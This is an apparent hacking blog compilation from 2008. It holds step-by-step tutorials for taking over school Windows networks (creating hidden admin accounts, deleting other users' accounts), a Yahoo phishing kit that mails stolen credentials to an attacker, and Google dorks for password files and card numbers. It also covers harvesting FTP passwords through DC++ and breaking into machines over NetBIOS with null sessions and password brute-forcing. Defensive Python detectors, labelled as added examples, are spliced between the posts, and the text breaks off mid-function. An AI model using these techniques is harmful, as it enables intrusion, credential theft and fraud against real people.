FOR MULTILOGIN IN YAHOOMESSENGER
1. Open Notepad.
2. Paste these codes:
REGEDIT4
[HKEY_CURRENT_USER\Software\yahoo\pager\Test]
"Plural"=dword:00000001
3. Save it as multi.reg
4. Either double-click this file or right-click it and select the Merge option. (The aim is to merge these settings into the registry.)
Wednesday, January 23, 2008
hacking school
NOTICE: TO ALL CONCERNED Certain text files and messages contained on this site deal with activities and devices which would be in violation of various Federal, State, and local laws if actually carried out or constructed. The webmasters of this site do not advocate the breaking of any law. Our text files and message bases are for informational purposes only. We recommend that you contact your local law enforcement officials before undertaking any project based upon any information obtained from this or any other web site. We do not guarantee that any of the information contained on this system is correct, workable, or factual. We are not responsible for, nor do we assume any liability for, damages resulting from the use of any information on this site.
Hacking your school (Version 1.1) by Timmeh
Hacking at school
This tutorial is aimed at school servers running Windows underneath (most of them do). It definitely works with Windows 98, 2000, Me, and XP. I never tried it with 95, but it should work anyway. Schools can stop batch files from working, but it is very uncommon for them to be that switched on.
There are problems with school servers, and they mostly come back to the basic architecture of the system, so the admins are unlikely to do anything about it! In this article I will discuss how to bypass web filtering software at school, send messages everywhere you want, create admin accounts, modify others' accounts, and generally cause havoc. Please note that I have refrained from giving away information that will actually screw up your school server, though intelligent thinkers will work it out. This is because, for God's sake, this is a school! Don't screw them up!
How to get it all moving
An MS-DOS prompt is the best way to do stuff, because most admins don't think it's possible to get one and, if they do, they just can't do anything much about it.
First, open a Notepad file (if your school blocks Notepad, open a webpage, right-click and go to View Source. Hey presto, Notepad!). Now, write
command.com
and save the file as batch.bat, or anything with the extension .bat. Open this file and it will give you a command prompt (for more information on why this works, look to the end of the article). REMEMBER TO DELETE THIS FILE ONCE YOU'VE FINISHED!!! If the admins see it, they will kill you.
Bypassing that pesky web filtering
Well, now you've got a command prompt, it's time to visit whatever site you want. Now, there are plenty of ways to bypass poorly constructed filtering, but I'm going to take it for granted that your school has stopped these. This one, as far as I know, will never be stopped.
In your command prompt, type
ping hackthissite.org
or anything else you wanna visit. Now you should have a load of info, including delay times and, most importantly, an IP address for the website. Simply type this IP address into the address bar, preceded by http://, and you'll be able to access the page!
For example: http://197.57.189.10 etc.
Now, I've noticed a lot of people have been saying that there are other ways to bypass web filtering, and there are. I am only mentioning the best method I know. Others you might want to try are:
1) Using a translator, like Altavista's Babel Fish, to translate the page from Japanese or something to English. This will bypass the filtering and won't translate the page, since it's already in English.
2) When you search up the site on Google, there will be a link saying 'Cache'. Click that and you should be on.
3) Use a proxy. I recommend Proxify.com. If your school has blocked it, search it up on Google and do the above. Then you can search to your heart's content.
Sending messages out over the network
Okay, here's how to send crazy messages to everyone in your school on a computer. In your command prompt, type
Net Send * "The server is h4x0r3d"
*Note: may not be necessary, depending on how many your school has access to. If it's just one, you can leave it out*
Where is, replace it with the domain name of your school. For instance, when you log on to the network, you should have a choice of where to log on, either to your school, or to just the local machine. It tends to be called the same as your school, or something like it. So, at my school, I use
Net Send Varndean * "The server is h4x0r3d"
The asterisk denotes wildcard sending, or sending to every computer in the domain. You can swap this for people's accounts, for example
NetSend Varndean dan,jimmy,admin "The server is h4x0r3d"
Use commas to divide the names and NO SPACES between them.
Adding/modifying user accounts
Now that you have a command prompt, you can add a new user (ie yourself) like so
C:>net user username /ADD
where username is the name of your new account. And remember, try and make it look inconspicuous, then they'll just think it's a student who really is at school, when really, the person doesn't EXIST! If you wanna have a password, use this instead:
C:>net user username password /ADD
where password is the password you want to have. So for instance the above would create an account called 'username', with the password being 'password'. The below would have a username of 'JohnSmith' and a password of 'fruity'
C:>net user JohnSmith fruity /ADD
Right then, now that we can create accounts, let's delete them
C:>net user JohnSmith /DELETE
This will delete poor liddle JohnSmith's account. Awww. Do it to your enemies :P no, only joking, because they could have important work... well okay, only if you REALLY hate them
Let's give you admin privileges
C:>net localgroup administrator JohnSmith /ADD
This will make JohnSmith an admin. Remember that some schools may not call their admins 'administrator', so you need to find out the name of the local group they belong to.
You can list all the localgroups by typing
C:>net localgroup
Running .exe files you can't usually run
In the command prompt, use cd (change directory) to go to where the file is, use DIR to get the name of it, and put a shortcut of it on to a floppy. Run the program off the floppy disk.
Well, I hope this article helped a bit. Please vote for me if you liked it. Also, please don't go round screwing up your school servers; they are providing them free to you to help your learning.
I will add more as I learn more and remember stuff (I think I've left some stuff out - this article could get very long...)
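For administrators: the account changes described in this post (net user /ADD, /DELETE and net localgroup /ADD) all leave Security log events. The following is an added example, not part of the original post, that flags them in an exported log; the CSV column layout, the account names in the sample and the approved-admin list are assumptions.

```python
import csv
import io
from datetime import datetime, timedelta

# Constructed sample export, not real logs. The column layout is an assumption:
# time, event_id, actor (who made the change), target (account affected), group
SAMPLE_LOG = """\
2008-01-23T09:02:11,4720,sysadmin,newteacher,
2008-01-23T10:14:03,4720,pupil17,JohnSmith,
2008-01-23T10:14:40,4732,pupil17,JohnSmith,Administrators
2008-01-23T10:20:00,4726,pupil17,dan,
2008-01-23T11:00:00,4732,sysadmin,newteacher,Staff
"""

# Windows Security log event IDs (Vista / Server 2008 and later).
# Windows 2000/XP log the same events as 624, 630 and 636.
ACCOUNT_CREATED = 4720
ACCOUNT_DELETED = 4726
LOCAL_GROUP_MEMBER_ADDED = 4732

APPROVED_ADMINS = {"sysadmin"}          # assumption: accounts allowed to manage users
PRIVILEGED_GROUPS = {"administrators"}  # add any renamed admin groups here
PROMOTION_WINDOW = timedelta(minutes=10)


def parse_events(text):
    """Turn the CSV export into a time-ordered list of event dicts."""
    events = []
    for row in csv.reader(io.StringIO(text)):
        if len(row) != 5:
            continue  # skip blank or malformed lines
        when, event_id, actor, target, group = (c.strip() for c in row)
        events.append({
            "time": datetime.fromisoformat(when),
            "id": int(event_id),
            "actor": actor,
            "target": target,
            "group": group,
        })
    return sorted(events, key=lambda e: e["time"])


def detect(events, approved=APPROVED_ADMINS):
    """Return (rule, actor, target) alerts for suspicious account changes."""
    approved = {a.lower() for a in approved}
    created_at = {}  # target account -> creation time
    alerts = []
    for ev in events:
        actor, target = ev["actor"], ev["target"]
        outsider = actor.lower() not in approved
        if ev["id"] == ACCOUNT_CREATED:
            created_at[target.lower()] = ev["time"]
            if outsider:
                alerts.append(("account-created-by-non-admin", actor, target))
        elif ev["id"] == ACCOUNT_DELETED:
            if outsider:
                alerts.append(("account-deleted-by-non-admin", actor, target))
        elif ev["id"] == LOCAL_GROUP_MEMBER_ADDED:
            if ev["group"].lower() not in PRIVILEGED_GROUPS:
                continue
            born = created_at.get(target.lower())
            # A brand-new account landing in an admin group is worth a look
            # even when an approved admin did it.
            if born is not None and ev["time"] - born <= PROMOTION_WINDOW:
                alerts.append(("new-account-promoted-to-admin", actor, target))
            elif outsider:
                alerts.append(("admin-group-change-by-non-admin", actor, target))
    return alerts


if __name__ == "__main__":
    for alert in detect(parse_events(SAMPLE_LOG)):
        print(alert)
```

Account management auditing has to be enabled on the machines for these events to be written at all.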
Fake yahoo email login.
U can make a fake url login page, email ur victim to visit ur fake login page / or just email ur fake login page (see yahoo email tips) and when he/she types the username and pass, the info 'll be send to u ex. by a cgi script. Cgi scripts can be found on the net. Although u can get here one.
NOTE: If u r going to email ur fake login page, on the pass file (of the form), check its properties and change it to normal (if not, when the user tries to type his/her password within the yahoo email account, he/she will be prompted not to type it). Yahoo recognizes pass fields and prompts users about it. Yahoo also recognizes info sent anywhere else than yahoo and prompts the user.
NOTE: U can also use cgi scripts from ur own site (must support cgi).
We are providing a working example of a fake login page, with an external cgi script, which 'll email u the username and the password. Just download the zip file HERE and follow the below instructions.
1. Open the ready.htm file, Edit (file menu top left) -> Select all and press CTRL+C.
2. Open ur email client or account (must support html ex. yahoo email), compose a new email and press CTRL+V in the text field.
3. Send it to ur victim(s).
The ready.htm file 'll proceed the info to am20forces@yahoo.com. So just change it to ur email address (open ready.htm with ex. notepad, search for am20forces@yahoo.com text and change it). Also with the same way change the title (not the name of ready.htm, the title within the html codes) to something like "Yahoo email restore".
NOTE: The fake login page is a quick build page, but the job is done perfectly. Just remember to change the info as mentioned above and that the received email 'll contain username and "email address" (which "email address" is the password).
Instead of the page, u can send a link to the fake login page. U can obscure the link (read in "Tutorials" -> "Obscure url") or just fake the displayed text of the link using ex. Microsoft Word (click the example to see) ex. http://www.mail.yahoo.com/restore.asp?id=3587496 or combined the methods.
NOTE: Use a fake email address (u can use a fake email sender app ex. similar to "ELBOMB" in "Others" download section) ex. YAHOO_ADMIN@yahoo_bot.com with description to be "ACCOUNT ERROR". Lots of ppl receives such emails, claiming that they must relogin to activate their account due to an error etc.
In the zip file, u can also find a cgi submission script, which u can edit/modify as u like and upload it on ur site. It's preferable to create ur own (if u 've the knowledge) cgi script, or just modify one (and not use a cgi script provider).
tm file on ur site (using web service provider ex. geocities), remember to upload all the files included (images etc.) in the "ready" folder.
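For mail filtering: the message described in this post has several machine-checkable traits, namely a form that posts away from the real site, a credential field (even when its type is switched from password to plain text), link text that shows one host while the href goes to another, and a lookalike sender domain. The following is an added example, not part of the original post, that checks an HTML body for them; the sample message, its placeholder hosts and the field-name hints are constructed assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample message body (hosts are documentation placeholders).
SAMPLE_HTML = """
<p>ACCOUNT ERROR: you must log in again to restore your mailbox.</p>
<form action="http://collector.example.net/cgi-bin/submit.cgi" method="post">
  Yahoo! ID: <input type="text" name="login">
  Password: <input type="text" name="passwd">
  <input type="submit" value="Sign In">
</form>
<a href="http://203.0.113.7/restore">http://www.mail.yahoo.com/restore.asp</a>
"""

CREDENTIAL_HINTS = ("pass", "pwd")  # assumption: substrings of credential field names


def host_of(url):
    """Lower-cased host of a URL; accepts scheme-less text such as 'www.x.com/a'."""
    if "://" not in url:
        url = "http://" + url
    try:
        return (urlsplit(url).hostname or "").lower()
    except ValueError:
        return ""


def same_site(host, trusted):
    """True when host is the trusted domain or one of its subdomains."""
    return host == trusted or host.endswith("." + trusted)


class _BodyAudit(HTMLParser):
    def __init__(self, trusted):
        super().__init__()
        self.trusted = trusted
        self.findings = []
        self._href = None   # href of the <a> currently open, if any
        self._text = []     # visible text collected inside that <a>

    def handle_starttag(self, tag, attrs):
        attr = {k: (v or "") for k, v in attrs}
        if tag == "form":
            host = host_of(attr.get("action", ""))
            if host and not same_site(host, self.trusted):
                self.findings.append(("form-posts-off-site", host))
        elif tag == "input":
            name = attr.get("name", "").lower()
            kind = attr.get("type", "text").lower()
            # Key on the field name too: the type may have been changed to text.
            if kind == "password" or any(h in name for h in CREDENTIAL_HINTS):
                self.findings.append(("credential-field", name))
        elif tag == "a":
            self._href, self._text = attr.get("href", ""), []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag != "a" or self._href is None:
            return
        shown = "".join(self._text).strip()
        if shown.lower().startswith(("http://", "https://", "www.")):
            if host_of(shown) != host_of(self._href):
                self.findings.append(("link-text-mismatch", host_of(self._href)))
        self._href = None


def audit_message(from_addr, html, trusted="yahoo.com"):
    """Return a list of (finding, detail) tuples for one HTML message."""
    findings = []
    domain = from_addr.rsplit("@", 1)[-1].lower()
    brand = trusted.split(".")[0]
    if brand in domain and not same_site(domain, trusted):
        findings.append(("lookalike-sender", domain))
    parser = _BodyAudit(trusted)
    parser.feed(html)
    parser.close()
    return findings + parser.findings


if __name__ == "__main__":
    for finding in audit_message("YAHOO_ADMIN@yahoo_bot.com", SAMPLE_HTML):
        print(finding)
```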
Google Hacking
These methods will be easily understood by the Hackers
Any help for the Novice Hackers Please drop in your Comments : Rahul
u can also drop in ur E - Mail Id's to be mailed a detailed Presentation on Google HACKING
Using Google, and some finely crafted searches we can find a lot of interesting information.
For Example we can find:
Credit Card Numbers
Passwords
Software / MP3's
...... (and on and on and on) Presented below is just a sample of interesting searches that we can send to google to obtain info that some people might not want us having.. After you get a taste using some of these, try your own crafted searches to find info that you would be interested in.
Try a few of these searches:
intitle:"Index of" passwords modified
allinurl:auth_user_file.txt
"access denied for user" "using password"
"A syntax error has occurred" filetype:ihtml
allinurl: admin mdb
"ORA-00921: unexpected end of SQL command"
inurl:passlist.txt
"Index of /backup"
"Chatologica MetaSearch" "stack tracking:"
Amex Numbers: 300000000000000..399999999999999
MC Numbers: 5178000000000000..5178999999999999
visa 4356000000000000..4356999999999999
"parent directory " /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory "Xvid -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory "MP3-xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " Name of Singer or album -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
Notice that I am only changing the word after the parent directory, change it to what you want and you will get a lot of stuff.
METHOD 2
put this string in google search:
?intitle:index.of? mp3
You only need add the name of the song/artist/singer.
Example: ?intitle:index.of? mp3 jackson
METHOD 3
put this string in google search:
inurl:microsoft filetype:iso
You can change the string to whatever you want, ex. microsoft to adobe, iso to zip etc…
"# -FrontPage-" inurl:service.pwd
Frontpage passwords.. very nice clean search results listing !!
"AutoCreate=TRUE password=*"
This searches the password for "Website Access Analyzer", a Japanese software that creates webstatistics. For those who can read Japanese, check out the author's site at: http://www.coara.or.jp/~passy/
"http://*:*@www" domainname
This is a query to get inline passwords from search engines (not just Google). You must type in the query followed by the domain name without the .com or .net
"http://*:*@www" bangbus or "http://*:*@www"bangbus
Another way is by just typing
"http://bob:bob@www"
"sets mode: +k"
This search reveals channel keys (passwords) on IRC as revealed from IRC chat logs.
allinurl: admin mdb
Not all of these pages are administrator's access databases containing usernames, passwords and other sensitive information, but many are!
allinurl:auth_user_file.txt
DCForum's password file. This file gives a list of (crackable) passwords, usernames and email addresses for DCForum and for DCShop (a shopping cart program!!!). Some lists are bigger than others, all are fun, and all belong to googledorks. =)
intitle:"Index of" config.php
This search brings up sites with "config.php" files. To skip the technical discussion, this configuration file contains both a username and a password for an SQL database. Most sites with forums run a PHP message base. This file gives you the keys to that forum, including FULL ADMIN access to the database.
eggdrop filetype:user user
These are eggdrop config files. Avoiding a full-blown discussion about eggdrops and IRC bots, suffice it to say that this file contains usernames and passwords for IRC users.
intitle:index.of.etc
This search gets you access to the etc directory, where many many many types of password files can be found. This link is not as reliable, but crawling etc directories can be really fun!
filetype:bak inurl:"htaccess|passwd|shadow|htusers"
This will search for backup files (*.bak) created by some editors or even by the administrator himself (before activating a new version).
Every attacker knows that changing the extension of a file on a webserver can have ugly consequences.
Let's pretend you need a serial number for windows xp pro.
In the google search bar type in just like this - "Windows XP Professional" 94FBR
the key is the 94FBR code.. it was included with many MS Office registration codes so this will help you dramatically reduce the amount of 'fake' porn sites that trick you.
or if you want to
find the serial for winzip 8.1 - "Winzip 8.1"
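For site owners: most of the queries in this post only return results when a web root contains one of a handful of file names or a directory without an index page. The following is an added example, not part of the original post, that walks a local copy of a web root and reports what those queries would match; the index-file names and the sample tree are assumptions, and the sample files hold placeholder text only.

```python
import fnmatch
import os
import tempfile

# File-name patterns taken from the queries in this post -> the query they serve.
SENSITIVE_PATTERNS = {
    "auth_user_file.txt": "allinurl:auth_user_file.txt",
    "passlist.txt": "inurl:passlist.txt",
    "service.pwd": '"# -FrontPage-" inurl:service.pwd',
    "*.mdb": "allinurl: admin mdb",
    "*.user": "eggdrop filetype:user user",
    "*.bak": "filetype:bak",
}
# Assumption: the names the web server treats as a directory index.
INDEX_FILES = {"index.html", "index.htm", "index.php"}


def audit_webroot(root):
    """Return sorted (relative_path, finding, matching_query) tuples."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root).replace(os.sep, "/")
        names = {f.lower() for f in filenames}
        # No index file: the server shows an "Index of" page if autoindex is on.
        if not names & INDEX_FILES:
            findings.append((rel_dir, "listable-if-autoindex", 'intitle:"Index of"'))
        for name in filenames:
            rel = name if rel_dir == "." else rel_dir + "/" + name
            for pattern, query in SENSITIVE_PATTERNS.items():
                if fnmatch.fnmatch(name.lower(), pattern):
                    findings.append((rel, "sensitive-file", query))
                    break
    return sorted(findings)


def make_sample_tree(root):
    """Create a small constructed web root (placeholder contents only)."""
    layout = [
        "index.html",
        "forum/index.php",
        "forum/config.php",
        "forum/config.php.bak",   # served as plain text, not run as PHP
        "backup/passlist.txt",
        "backup/site.tar.gz",
        "cgi-bin/auth_user_file.txt",
    ]
    for rel in layout:
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as handle:
            handle.write("placeholder\n")


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as webroot:
        make_sample_tree(webroot)
        for path, finding, query in audit_webroot(webroot):
            print(f"{finding:22} {path:28} {query}")
```

Anything reported belongs outside the document root or behind access control, and directory listing should be off for the directories flagged.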
hack ftp site via google
You all know, or should know, that there are SEVERAL ways to do something, and they all might be right. I'm going to show you the simplest but also (in my opinion) most rewarding way to get access to FTPs.
You start with downloading DC++ from Google. For all of you who don't know what DC++ is, it is a p2p software to share files. It's not like Kazaa or something, so you don't just search; you have to enter "hubs" (they're kind of like rooms) and search for the files in there. Every hub has its own rules; for example, you must share at least 10GB to enter it or something. But there are also hubs with no share limit, so you can enter them right away, but they aren't really the best. I would recommend getting maybe a 50GB share or something, because then you can enter MOST of the hubs. The better the hubs you enter, the higher the chance that you will find passwords.
Right when you've downloaded DC++ and made all the configurations, enter a good hub (one with a lot of people). Now to the password harvesting part. To get hold of passwords you need to get some dat files. For example, some FTP clients store their passwords in files. One of the most popular clients is Flash FXP; that client stores the password in the sites.dat file. So what you do is search for the sites.dat file in DC++ and make sure that you uncheck the option "Only find user with free slots", since the file you are going to download only takes around 3 kb or something. Then you are able to download it even if your target doesn't have any free slots. Right after you've downloaded around 5 of them, go to Google and search for Flash FXP password decrypter. Then just open the sites.dat file with Notepad and decrypt the passwords. Tada! You can now enter the FTP, unless they changed it of course.
Another way is to search for another client's password file. One is called WS FTP32. Hmm, now when I think about it I don't really remember, but I think the file was called wsftp.ini. You could use an online decrypter to decrypt those passwords... you could just google it or go to:
h77p://www.hispasec.com/directorio/laboratorio/Software/ws_ftp.html
hacking using netbios
hack using netbios
Introduction.
Netbios stands for Network Basic Input Output System and is probably the easiest way to hack a system remotely. It was originally developed by IBM and Sytek as an Application Programming Interface (API) for client software to access LAN resources. Like any other service, it works on a port (in this case port 139).
NOTE: U can use any port scanner to find a system running netbios, by scanning for port 139. A specific scanner for netbios is "XSharez" which u can find it in our "scanners" download section.
Nbtstat command.
We can manually interact with netbios by using the command prompt and the nbtstat command. Just go to Start -> Run and type in "command" or "cmd". Ur MS-DOS window 'll open. Now type in nbtstat/? and u 'll get something like:
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\>nbtstat/?
Displays protocol statistics and current TCP/IP connections using NBT
(NetBIOS over TCP/IP).
NBTSTAT [ [-a RemoteName] [-A IP address] [-c] [-n]
[-r] [-R] [-RR] [-s] [-S] [interval] ]
-a (adapter status) Lists the remote machine's name table given its name
-A (Adapter status) Lists the remote machine's name table given its
IP address.
-c (cache) Lists NBT's cache of remote [machine] names and their IP
addresses
-n (names) Lists local NetBIOS names.
-r (resolved) Lists names resolved by broadcast and via WINS
-R (Reload) Purges and reloads the remote cache name table
-S (Sessions) Lists sessions table with the destination IP addresses
-s (sessions) Lists sessions table converting destination IP
addresses to computer NETBIOS names.
-RR (ReleaseRefresh) Sends Name Release packets to WINS and then, starts Refresh
RemoteName Remote host machine name.
IP address Dotted decimal representation of the IP address.
interval Redisplays selected statistics, pausing interval seconds
between each display. Press Ctrl+C to stop redisplaying
statistics.
NOTE: The main command that we are going to use is c:\>nbtstat -a ip ex. c:\>nbtstat -a 100.100.100.100
After we use the above command, we 'll get something like:
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------------
user <00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered
MAC Address = 00-02-48-18-29-E7
NOTE: The important thing here (which actually tells us that file and printer sharing is enabled on the victim's system) is the <20>.
NOTE: If we don't get a <20>, then this means that file and printer sharing is not enabled on the victim's system and we must search for another victim.
Now we type in MS-DOS (which should still be open) c:\>net view \\ip ex. c:\>net view \\100.100.100.100
Share name Type Used as Comment
-------------------------------------------------------------------------
CDISK Disk
HP-6L Print
OK, now we can see that our victim is sharing a disk named CDISK and a printer named HP-6L.
NOTE: If we are able to share the victim's hard disks, folders or printers, we will be able to read and write to the folders or hard disks, or we may also be able to print anything on a remote printer.
Normal connection.
Just type in MS-DOS c:\>net use k: \\100.100.100.100\CDISK
NOTE: Letter k can be anything u like. It 'll appear in ur "my computer" and u'll be able to control ur victim's system (like copy-paste-delete, read-write etc.)
If u get a confirmation like "Command was completed successfully", then just go to "my computer" and open the k:\ drive (which 'll be ur victim's drive on ur PC) and do anything u like.
Connection with Null Session.
For null session, we must use c:\>net use \\100.100.100.100\IPC$ "" /u .
NOTE: If we get Command completed successfully, then we are connected anonymously. If we get an error like ex. System error 51 occurred or Host not found, then the victim has turned on RestrictAnonymous to block anonymous connections.
Collecting information
• CIS or ENUM
• NAT (Netbios Auditing Tool)
NOTE: Those tools are in our "Scanners" Download section. Go get them. We are going to use them to collect info from victim.
ENUM (works from command prompt):
usage: enum [switches] [hostname|ip]
-U get userlist
-M get machine list
-N get namelist dump (different from -U|-M)
-S get sharelist
-P get password policy information
-G get group and member list
-L get LSA policy information
-D dictionary crack, needs -u and -f
-d be detailed, applies to -U and -S
-c don't cancel sessions
-u specify username to use (default "")
-p specify password to use (default "")
-f specify dictfile to use (wants -D)
If we type (in the ENUM command prompt) enum -U -S -G 100.100.100.100 , ENUM 'll try to connect to the victim with a null session (it doesn't matter if we already did) and we 'll get some info about the victim. See below for an example.
server: 100.100.100.100
setting up session... success.
getting user list (pass 1, index 0)... success, got 7.
Administrator Guest AM2o Cynos Sisqo printer
enumerating shares (pass 1)... got 6 shares, 0 left:
IPC$ print$ C ADMIN$ C$ CanonCLC320
Group: Administrators
AM2o\Administrator
Group: Backup Operators
Group: Guests
AM2o\Guest
Group: Power Users
AM2o\AM2o
AM2o\Cynos
AM2o\Sisqo
Group: *******
Group: Users
NT AUTHORITY\INTERACTIVE
NT AUTHORITY\Authenticated Users
AM2o\printer
Group: Debugger Users
NT AUTHORITY\SYSTEM
cleaning up... success.
NOTE: We can see from here the system name: AM2o, users: Administrator, Guest, Cynos, Sisqo, shared places: IPC$ print$ C ADMIN$ C$ CanonCLC320, power users: AM2o, Cynos, Sisqo. You can also use the other switches to collect more info if u like.
CIS (Cerberus Information Security):
Just set a host (without http://) or an ip (ex. 100.100.100.100), then go to "File" -> Select module and set "netbios checks". This 'll automatically collect information. When completed, press view report. The advantage of CIS is that when it finds a user, it automatically tries to find the password too, if one exists (i'll explain later about passwords).
NOTE: The symbol $ indicates hidden places, ex. ADMIN$ is the %systemroot% (for windows NT and 2000 C:\winnt, for XP C:\windows etc.). Those places are protected with passwords. So, try to avoid those places (for now). ex. if the sharing places are IPC$ print$ C ADMIN$ C$ CanonCLC320, then use net use \\100.100.100.100\C .
NAT (Netbios Auditing Tool):
This is a very good tool which 'll try to find the sharing places and get through the passes. It uses a userlist and passlist that we define, so collect as much info as u can with ENUM and/or CIS.
Usage: nat -o results.txt -u userlist.txt -p passlist.txt 100.100.100.100
NOTE: If a password is finally found, we use net use k: \\ip\place * /u:user ex. net use k: \\100.100.100.100\C * /u:Cynos and when we are asked for the pass, just type it and u are connected. U 'll get "Command completed successfully".
NOTE: Another good tool like NAT is PQwak2, which u can get here.
Disable File and Printer sharing.
• Click the Start Menu and choose Settings, Control Panel.
• Double-click the Network icon.
• Click the Configuration tab.
• Click the File and Print Sharing button. The File and Print Sharing dialog box will appear.
• Make sure that the following two boxes are NOT checked
"I want to be able to give others access to my files"
"I want to be able to allow others to print from my printers"
• Click the OK button in the File and Print Sharing dialog box.
• Click the OK button in the Network control panel.
A prompt box will appear requesting you to restart your computer.
(If no changes were made, this box may not appear.)
• Restart your computer for your new setting to take effect.
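For admins checking their own machines, the name table shown earlier can be read mechanically. The Python below is an added example, not part of the original tutorial: it parses saved nbtstat -A output and reports which hosts still register the <20> or <03> names, so the steps above can be applied to them. The host names, the second and third sample outputs and the remediation wording are constructed for illustration.

```python
import re

# Standard NetBIOS name suffixes (the hex value in <..>) and what registers them.
SUFFIX_SERVICES = {
    ("00", "UNIQUE"): "Workstation service (computer name)",
    ("00", "GROUP"): "workgroup or domain name",
    ("03", "UNIQUE"): "Messenger service (target of net send)",
    ("20", "UNIQUE"): "Server service (file and printer sharing)",
}

# Suffixes a plain workstation rarely needs to expose (wording is an assumption).
REMEDIATION = {
    "03": "Messenger service is running: stop it if net send pop-ups are unwanted",
    "20": "file and printer sharing is on: disable it if this PC should not share",
}

ROW = re.compile(
    r"^\s*(?P<name>\S.*?)\s*<(?P<suffix>[0-9A-Fa-f]{2})>\s+"
    r"(?P<type>UNIQUE|GROUP)\s+(?P<status>\S+)"
)
MAC = re.compile(r"MAC Address\s*=\s*([0-9A-Fa-f]{2}(?:-[0-9A-Fa-f]{2}){5})")


def parse_name_table(output):
    """Return (rows, mac) parsed from the text printed by nbtstat -A."""
    rows = []
    for line in output.splitlines():
        m = ROW.match(line)
        if m:  # header, separator and error lines carry no <xx> and are skipped
            rows.append({
                "name": m["name"],
                "suffix": m["suffix"].upper(),
                "type": m["type"],
                "status": m["status"],
            })
    mac = MAC.search(output)
    return rows, (mac.group(1).upper() if mac else None)


def audit_host(output):
    """Describe what one host registers and which entries need attention."""
    rows, mac = parse_name_table(output)
    services, findings = [], []
    for row in rows:
        if row["status"] != "Registered":
            continue  # names in conflict or released are not being served
        label = SUFFIX_SERVICES.get((row["suffix"], row["type"]), "unknown suffix")
        services.append((row["suffix"], label))
        if row["type"] == "UNIQUE" and row["suffix"] in REMEDIATION:
            findings.append((row["suffix"], REMEDIATION[row["suffix"]]))
    return {"mac": mac, "names": len(rows), "services": services,
            "findings": sorted(findings)}


def hosts_needing_fix(inventory):
    """Names of the hosts whose table still shows a <20> or <03> entry."""
    return sorted(h for h, out in inventory.items() if audit_host(out)["findings"])


# First entry is the table shown in the tutorial; the other two are constructed.
SAMPLE_INVENTORY = {
    "lab-pc-01": """NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------------
user <00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered
MAC Address = 00-02-48-18-29-E7
""",
    "lab-pc-02": """NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------------
LAB02 <00> UNIQUE Registered
workgroup <00> GROUP Registered
MAC Address = 00-02-48-18-29-E8
""",
    "lab-pc-03": "Host not found.\n",
}

if __name__ == "__main__":
    for host in hosts_needing_fix(SAMPLE_INVENTORY):
        for suffix, advice in audit_host(SAMPLE_INVENTORY[host])["findings"]:
            print(f"{host}: <{suffix}> {advice}")
```

A host that answers with no name table at all (lab-pc-03 here) is counted as having zero names rather than raising an error.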
how to not get hacked
Protect Urself !
Follow These Simple Guidelines n u are done
1. Stop using Internet Explorer and make the switch to Opera, it's more secure, plain and simple.
2. Get Spybot Search and Destroy or Spyware Doctor and immediately update it.
3. Get Adaware SE and immediately update it.
(Use both as a 1-2 punch on infected client computers and between the two there's not much they won't kill)
4. Update your antivirus
5. Boot into safe mode and run all three scans
6. While the scans are going, check your registry (click Start --> Run and type regedit to get into the registry) and look in HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run & HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run. Verify that all programs listed are legitimate and wanted.
7. If or when your antivirus scan comes across anything, search for that file name in your registry and delete it.
8. Use explorer to go to the windows/system32 folder and sort by date. If you haven't already done so, make sure you can see the entire file names. Click Tools --> Folder Options and unclick the box labeled "Hide extensions for known file types" and under Hidden files and folders click "Show hidden files and folders." However, make sure you choose "Hide protected operating system files" so you don't accidentally remove anything that would cripple your computer. You are looking for recent files with names ending with .exe and .dll that look suspicious. Major culprits will have gibberish names such as alkjdlkjfa.exe.
9. Once you can get clean scans in safe mode, reboot in normal mode and scan all over again. If you can't get a clean scan in regular mode then you have something more persistent that could take more research.
10. Make sure your firewall doesn't have strange exceptions.
11. If you suspect anything that is going wrong with your computer is the action of a stalker, on a more secure system change all your passwords.
12. If your system has been specifically targeted and hacked you can never be 100% sure that your system is no longer compromised so start with 11, make backups of personal files on the infected system and format and re-install Windows.
Good luck!
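Steps 6 and 8 can be done over a saved reg query export instead of by eye. The Python below is an added example, not from the original post: it parses an export of the two Run keys and flags entries that start from a Temp directory or whose file name looks like gibberish. The sample export, the consonant-run threshold and the function names are assumptions made for the illustration.

```python
import ntpath
import re

KEY_LINE = re.compile(r"^(HKEY_[A-Z_]+\\.+)$")
VALUE_LINE = re.compile(
    r"^\s+(?P<name>.+?)\s+(?P<type>REG_(?:SZ|EXPAND_SZ|MULTI_SZ|DWORD|BINARY))"
    r"\s+(?P<data>.*)$"
)
# Quoted path, or an unquoted path up to the first executable-looking extension.
EXE = re.compile(r'^"([^"]+)"|^(.+?\.(?:exe|dll|bat|cmd|scr|vbs|com))\b', re.I)

GIBBERISH_RUN = 5  # assumed threshold: 5+ consonants in a row in the file name


def parse_reg_query(text):
    """Turn the text printed by reg query into a list of Run entries."""
    entries, key = [], None
    for line in text.splitlines():
        line = line.rstrip()
        k = KEY_LINE.match(line)
        if k:
            key = k.group(1)
            continue
        v = VALUE_LINE.match(line)
        if v and key:
            entries.append({"key": key, "name": v["name"], "data": v["data"]})
    return entries


def exe_path(data):
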